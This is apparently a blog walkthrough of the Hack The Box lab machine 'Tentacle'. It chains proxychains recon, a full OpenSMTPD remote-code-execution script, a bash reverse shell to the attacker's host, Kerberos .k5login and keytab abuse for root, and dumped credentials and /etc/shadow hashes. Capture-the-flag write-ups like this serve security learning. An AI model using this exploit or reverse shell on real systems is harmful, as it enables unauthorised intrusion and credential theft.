Hack-The-Box-walkthrough[Tentacle]

Posted on Edited on In Views: Word count in article: 2.7k Reading time ≈ 10 mins.

introduce

OS: Linux
Difficulty: Hard
Points: 40
Release: 23 Jan 2021
IP: 10.10.10.224

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
7
8
9
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.224
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 8.0 (protocol 2.0)
53/tcp   open   domain       ISC BIND 9.11.20 (RedHat Enterprise Linux 8)
88/tcp   open   kerberos-sec MIT Kerberos (server time: 2021-01-31 01:37:21Z)
3128/tcp open   http-proxy   Squid http proxy 4.11
9090/tcp closed zeus-admin
Service Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8

there’s a http server running on port 3128 let’s go there also nmap gave us a host: REALCORP.HTB

Got a username and a subdomain 😀 note these little hints, will be help us later 🙂 

1
2
j.nakazawa@realcorp.htb
srv01.realcorp.htb (squid/4.11)

Also got hash while running GetNPUsers.py but that seems uncrackable, here I stucked for more hours and finally found the way that was fuzzing the other dommains

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# dnsenum --threads 64 --dnsserver 10.10.10.224 --file /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb 
ns.realcorp.htb.                         259200   IN    A        10.197.243.77
proxy.realcorp.htb.                      259200   IN    CNAME    ns.realcorp.htb.                                                                  
ns.realcorp.htb.                         259200   IN    A        10.197.243.77
ns.realcorp.htb.                         259200   IN    A        10.197.243.77
wpad.realcorp.htb.                       259200   IN    A        10.197.243.31
ns.realcorp.htb.                         259200   IN    A        10.197.243.77

So many domains and Ips 😦 But that can’t be easily accessible we need to use proxychains to enum it 🙂

update proxychains to avoid small errors 🙂

1
apt-get install proxychains4

and need to add that proxy in our conf file. Edit /etc/proxychains.conf file

Here using dynamic chain you can also use strict chain 🙂

1
2
3
http  10.10.10.224 3128
http  127.0.0.1 3128
http  10.197.243.77 3128

Add these things to the bottom of that conf file, then start enum

let’s nmap again 🙂 scan that .31 ip wpad.realcorp.htb

1
2
3
4
5
6
7
8
9
proxychains -f /etc/proxychains.conf nmap -sT -Pn -v 10.197.243.31
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
464/tcp  open  kpasswd5
749/tcp  open  kerberos-adm
3128/tcp open  squid-http

sorted the nmap result coz it’s too long 😀

there’s a server running on port 80 let’s see that 😀 and remember need to use proxychains to view that page so

1
proxychains -f /etc/proxychains.conf firefox wpad.realcorp.htb

add that to /etc/hosts file => “10.197.243.31 wpad.realcorp.htb”

got forbidden there 😦 but go to /wpad.dat able to download a file 🙂

Download and view that

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# proxychains -f /etc/proxychains.conf wget http://wpad.realcorp.htb/wpad.dat
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
--2021-01-30 21:21:33--  http://wpad.realcorp.htb/wpad.dat
正在解析主机 wpad.realcorp.htb (wpad.realcorp.htb)... 10.197.243.31
正在连接 wpad.realcorp.htb (wpad.realcorp.htb)|10.197.243.31|:80... [proxychains] Dynamic chain  ...  10.10.10.224:3128  ...  127.0.0.1:3128  ...  10.197.243.77:3128  ...  10.197.243.31:80  ...  OK
已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:342 [application/octet-stream]
正在保存至: “wpad.dat”

wpad.dat                             100%[=====================================================================>]     342  --.-KB/s  用时 0s      

2021-01-30 21:21:37 (41.1 MB/s) - 已保存 “wpad.dat” [342/342])

┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# ls
wpad.dat
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# cat wpad.dat 
function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
        return "DIRECT"; 
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
        return "DIRECT"; 
 
    return "PROXY proxy.realcorp.htb:3128";
}

look another IP 😦 let’s scan that there’s 10.197.243.0 but we already done that so let’s try that second IP

scanned that whole IP range and I found the IP 10.241.251.113 and there is smtp port opened 🙂

1
2
3
4
5
6
7
8
9
proxychains -f /etc/proxychains.conf nmap -sT -sV -Pn 10.241.251.113
....
Nmap scan report for 10.241.251.113
Host is up (1.1s latency).

PORT   STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
Service Info: Host: smtp.realcorp.htb
....

fine there’s OpenSMTPD running let’s search some exploits for this on internet 🙂

1
google OpenSMTPD exploit

Sounds good 🙂 let’s try that (tried many exploits in python, perl and one in metasploit)

But looks like need to modify our exploit to pop a shell, so I edited a exploit that I found from Remote code execution in OpenSMTPD

simply modified that exploit to get shell 🙂 here is it

  • getshell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import socket, time
import sys
if len(sys.argv) < 4:
    print("usage: script.py <host> <port> <command>")
    exit()
HOST = sys.argv[1]
PORT = int(sys.argv[2])
rev_shell_cmd = sys.argv[3]
payload = b"""\r\n

#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n 
#c\r\n
#d\r\n
""" + rev_shell_cmd.encode() + b"""
.
"""
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except OSError as msg:
        s = None
        continue
    try:
        s.connect(sa)
    except OSError as msg:
        s.close()
        s = None
        continue
    break
if s is None:
    print('could not open socket')
    sys.exit(1)
with s:
    data = s.recv(1024)
    print('Received', repr(data))
    time.sleep(1)
    print('SENDING HELO')
    s.send(b"helo test.com\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
    time.sleep(1)
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"RCPT TO:<j.nakazawa@realcorp.htb>\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"DATA\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(payload)
    data = s.recv(1024)
    print('RECIEVED', repr(data))
    s.send(b"QUIT\r\n")
    data = s.recv(1024)
    print('RECIEVED', repr(data))
print("Exploited Check you netcat :D")
s.close()

start a netcat listener and run that above script like this

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# proxychains -f /etc/proxychains.conf python3 getshell.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.14.25/3334 <&1"'
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Dynamic chain  ...  10.10.10.224:3128  ...  127.0.0.1:3128  ...  10.197.243.77:3128  ...  10.241.251.113:25  ...  OK
Received b'220 smtp.realcorp.htb ESMTP OpenSMTPD\r\n'
SENDING HELO
RECIEVED b'250 smtp.realcorp.htb Hello test.com [10.241.251.1], pleased to meet you\r\n'
RECIEVED b'250 2.0.0 Ok\r\n'
RECIEVED b'250 2.1.5 Destination address valid: Recipient ok\r\n'
RECIEVED b'354 Enter mail, end with "." on a line by itself\r\n'
RECIEVED b'250 2.0.0 f1c85e8f Message accepted for delivery\r\n'
RECIEVED b'221 2.0.0 Bye\r\n'
Exploited Check you netcat :D

and got a shelll

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[~]
└─# nc -lvp 3334                                                                                                                                   
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::3334
Ncat: Listening on 0.0.0.0:3334
Ncat: Connection from 10.10.10.224.
Ncat: Connection from 10.10.10.224:52864.
bash: cannot set terminal process group (12): Inappropriate ioctl for device
bash: no job control in this shell
root@smtp:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@smtp:~# whoami
whoami
root

Cool we got shell as root user of smtp

PRIVESC TO USER

try to search for creds

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@smtp:/home/j.nakazawa# cat .msmtprc
cat .msmtprc
# Set default values for all following accounts.
defaults
auth           on
tls            on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile        /dev/null

# RealCorp Mail
account        realcorp
host           127.0.0.1
port           587
from           j.nakazawa@realcorp.htb
user           j.nakazawa
password       sJB}RM>6Z~64_
tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60

# Set a default account
account default : realcorp

Quickly got creds 😀 that’s located in /home/j.nakazawa

but sadly can’t able to ssh with it 😦 need to use kerbos to generate a ticket and use that ticket to log in as the user, let’s do that

Make sure installed that, If not then do it with the below commands

1
apt-get install krb5-user

then modify /etc/hosts and /etc/krb5.conf files

1
10.10.10.224    srv01.realcorp.htb

make sure have this host in /etc/hosts file

1
2
3
4
5
default_realm = REALCORP.HTB

REALCORP.HTB = {
        kdc = 10.10.10.224
        }

and add this on /etc/krb5.conf file

then going to generate the ticket

1
2
3
──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# kinit j.nakazawa
Password for j.nakazawa@REALCORP.HTB:

use this to generate the ticket, it asks for password, Enter the password that we got above in /home/j.nakazawa folder

1
2
3
4
5
6
7
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: j.nakazawa@REALCORP.HTB

Valid starting       Expires              Service principal
2021-01-30T22:12:34  2021-01-31T22:10:00  krbtgt/REALCORP.HTB@REALCORP.HTB

use this commands to check the available tickets

There you go simply log in, this time it won’t asks password. If it asks for password you done a mistake anywhere 😦 correct it and try again

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root💀kali)-[~/hackthebox/machine/tentacle]
└─# ssh j.nakazawa@10.10.10.224
The authenticity of host '10.10.10.224 (10.10.10.224)' can't be established.
ECDSA key fingerprint is SHA256:eWzMB5HoqVH++9udWLB4bYS/8KguhJxNZPtZ3JLc3oo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.224' (ECDSA) to the list of known hosts.
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Thu Dec 24 06:02:06 2020 from 10.10.14.2
[j.nakazawa@srv01 ~]$ id
uid=1000(j.nakazawa) gid=1000(j.nakazawa) 组=1000(j.nakazawa),23(squid),100(users) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[j.nakazawa@srv01 ~]$ whoami
j.nakazawa
[j.nakazawa@srv01 ~]$ ls
user.txt
[j.nakazawa@srv01 ~]$ cat user.txt
3e644f8b453a335ba99548e35919b78e

Good here we logged as j.nakazawa fastly grab the user.txt and follow my steps, here after it’s a headache to go forward

PRIVESC TO ADMIN

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[j.nakazawa@srv01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
* * * * * admin /usr/local/bin/log_backup.sh

fine while seeing the crontab there’s a file running named “log_backup.sh”, let’s view it 🙂

1
2
3
4
5
6
7
[j.nakazawa@srv01 ~]$ cat /usr/local/bin/log_backup.sh
#!/bin/bash

/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/
cd /home/admin
/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log
/usr/bin/rm -f access.log cache.log

It backups everything from /var/log/squid to /home/admin

So if we put something in that squid folder then it’ll be copied to admin’s folder, fine now let’s create a log in file then we can log as admin coz it copied to that admin’s folder

now create a file named .k5login

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[j.nakazawa@srv01 ~]$ echo "j.nakazawa@REALCORP.HTB" > .k5login
[j.nakazawa@srv01 ~]$ ls -la
总用量 20
drwxr-x---. 2 j.nakazawa j.nakazawa 131 1月  31 03:22 .
drwxr-xr-x. 4 root       root        37 11月  3 15:22 ..
lrwxrwxrwx. 1 root       root         9 12月  9 08:26 .bash_history -> /dev/null
-rw-r--r--. 1 j.nakazawa j.nakazawa  18 11月  8 2019 .bash_logout
-rw-r--r--. 1 j.nakazawa j.nakazawa 141 11月  8 2019 .bash_profile
-rw-r--r--. 1 j.nakazawa j.nakazawa 312 11月  8 2019 .bashrc
-rw-rw-r--. 1 j.nakazawa j.nakazawa  24 1月  31 03:22 .k5login
lrwxrwxrwx. 1 root       root         9 12月  9 12:30 .lesshst -> /dev/null
-r--------. 1 j.nakazawa j.nakazawa  33 1月  31 01:12 user.txt
[j.nakazawa@srv01 ~]$ cat .k5login
j.nakazawa@REALCORP.HTB
1
cp .k5login /var/log/squid

then copy this file to /var/log/squid folder. can’t able to go to that folder (permissions denied) but we can copy this file there, so do that

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[~]
└─# ssh admin@srv01.realcorp.htb
The authenticity of host 'srv01.realcorp.htb (10.10.10.224)' can't be established.
ECDSA key fingerprint is SHA256:eWzMB5HoqVH++9udWLB4bYS/8KguhJxNZPtZ3JLc3oo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'srv01.realcorp.htb' (ECDSA) to the list of known hosts.
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Sun Jan 31 03:27:01 2021
[admin@srv01 ~]$ id
uid=1011(admin) gid=1011(admin) 组=1011(admin),23(squid) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[admin@srv01 ~]$ whoami
admin
[admin@srv01 ~]$ ls
squid_logs.tar.gz.2021-01-31-032501  squid_logs.tar.gz.2021-01-31-032601  squid_logs.tar.gz.2021-01-31-032701

after doing that try to log in as admin (try 2~3 times) some times it takes time to copy that log in file

ADMIN TO ROOT

fine now we’re admin after enuming some time this file seems interesting “krb5.keytab” it’s located in /etc folder.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[admin@srv01 ~]$ klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB

So what’s a keytab file?

A keytab is a file containing pairs of Kerberos principals and encrypted keys (which are derived from the Kerberos password). You can use a keytab file to authenticate to various remote systems using Kerberos without entering a password.

note that bolded text now we’re going to do that 😀

1
kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB

run this

1
add_principal root@REALCORP.HTB

then the kadmin’s console tab will open, add this principle into it

1
2
3
4
5
6
7
8
[admin@srv01 ~]$ kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB
Couldn't open log file /var/log/kadmind.log: Permission denied
Authenticating as principal kadmin/admin@REALCORP.HTB with keytab /etc/krb5.keytab.
kadmin:  add_principal root@REALCORP.HTB
No policy specified for root@REALCORP.HTB; defaulting to no policy
Enter password for principal "root@REALCORP.HTB": 
Re-enter password for principal "root@REALCORP.HTB": 
Principal "root@REALCORP.HTB" created.

Then it ask’s to create password, create a password there then exit that kadmin’s console, just type exit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[admin@srv01 ~]$ ksu root
WARNING: Your password may be exposed if you enter it here and are logged 
         in remotely using an unsecure (non-encrypted) channel. 
Kerberos password for root@REALCORP.HTB: : 
Authenticated root@REALCORP.HTB
Account root: authorization for root@REALCORP.HTB successful
Changing uid to root (0)
[root@srv01 admin]# id
uid=0(root) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@srv01 admin]# whoami
root
[root@srv01 admin]# cd
[root@srv01 ~]# ls
anaconda-ks.cfg  Linux_release_checklist.sh  root.txt
[root@srv01 ~]# cat root.txt
9b46410371881ac43708ca604eb10aab

then type ksu root and it ask’s for password just type the password that you’ve created above in kadmin’s console 😀

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
[root@srv01 ~]# cat /etc/shadow
root:$6$2ZKaulGjQ1QUYQHO$OmVJBK0.VeikBcOsxyrLfPCEkrfo6S8SJmHd4FH7el9vHcduJrO7jHYEHjIN7Z4n1c3KBLNe5L9inXSgeBsNS.:18605:0:99999:7:::
bin:*:18358:0:99999:7:::
daemon:*:18358:0:99999:7:::
adm:*:18358:0:99999:7:::
lp:*:18358:0:99999:7:::
sync:*:18358:0:99999:7:::
shutdown:*:18358:0:99999:7:::
halt:*:18358:0:99999:7:::
mail:*:18358:0:99999:7:::
operator:*:18358:0:99999:7:::
games:*:18358:0:99999:7:::
ftp:*:18358:0:99999:7:::
nobody:*:18358:0:99999:7:::
dbus:!!:18602::::::
systemd-coredump:!!:18602::::::
systemd-resolve:!!:18602::::::
tss:!!:18602::::::
polkitd:!!:18602::::::
libstoragemgmt:!!:18602::::::
cockpit-ws:!!:18602::::::
cockpit-wsinstance:!!:18602::::::
sssd:!!:18602::::::
sshd:!!:18602::::::
chrony:!!:18602::::::
rngd:!!:18602::::::
unbound:!!:18602::::::
squid:!!:18602::::::
named:!!:18602::::::
nginx:!!:18602::::::
j.nakazawa:$6$W68LBvOuL0H13AqJ$G4JdGleMyHdzvBmpcV7JiLupa3bosgxHj.aUfxcydXIODXuepjj6uUIQ/5E2THv2sf5Qhp7qtBIEu4kmNl2pU1:18604:0:99999:7:::
admin:!!:18605:0:99999:7:::
setroubleshoot:!!:18620::::::

Summary of knowledge

  • usage of proxychains
  • dnsenum fuzz subdomains
  • OpenSMTPD Remote code execution
  • use kerbos to generate ticket
  • use crontab to copy files
  • use keytab file to authenticate to various remote systems using Kerberos without entering a password to get root

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…